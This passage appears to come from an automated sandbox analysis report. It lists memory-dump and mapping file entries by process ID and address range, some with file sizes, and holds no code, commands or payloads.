                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4680-277-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4680-269-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4680-317-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4680-319-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4680-279-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4736-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4772-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5048-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5100-296-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5100-333-0x0000000004DA0000-0x000000000529E000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                                                                        • memory/5100-291-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                        • memory/5144-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5184-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5188-404-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                        • memory/5188-401-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5216-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5268-400-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5272-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5348-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5384-463-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5392-412-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5408-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5444-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5524-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5648-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5896-441-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5920-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5952-444-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/6016-445-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/6060-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/6072-448-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/6104-449-0x0000000000000000-mapping.dmp